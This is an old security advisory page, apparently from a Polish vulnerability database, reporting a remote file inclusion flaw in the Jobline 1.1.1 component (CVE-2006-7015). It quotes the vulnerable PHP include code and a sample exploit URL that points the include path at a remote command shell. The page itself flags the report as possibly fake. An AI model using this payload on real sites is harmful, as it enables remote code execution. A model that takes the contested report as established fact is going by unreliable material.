Jobline 1 1 1 Version - Remote File Include Vulnerability

WARNING! Fake news / Uwaga! Nota nieprawdziwa

Jobline 1 1 1 Version - Remote File Include Vulnerability

2007.02.17

Credit: SpC-x

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-7015

CWE: CWE-Other

Ogólna skala CVSS: 10/10

Znaczenie: 10/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Pełny

Wpływ na integralność: Pełny

Wpływ na dostępność: Pełny

# SaVSaK.CoM | SpC-x - The_BeKiR |

# Jobline 1 1 1 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Jobline

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.ph
p" ) ) {

#	include_once("$mosConfig_absolute_path/components/$option/language/$mosC
onfig_lang.php");

# } else {

#	include_once("$mosConfig_absolute_path/components/$option/language/engli
sh.php");

# }

# Vulnerable :

# http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=
Command-Shell

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Jobline 1 1 1 Version - Remote File Include Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.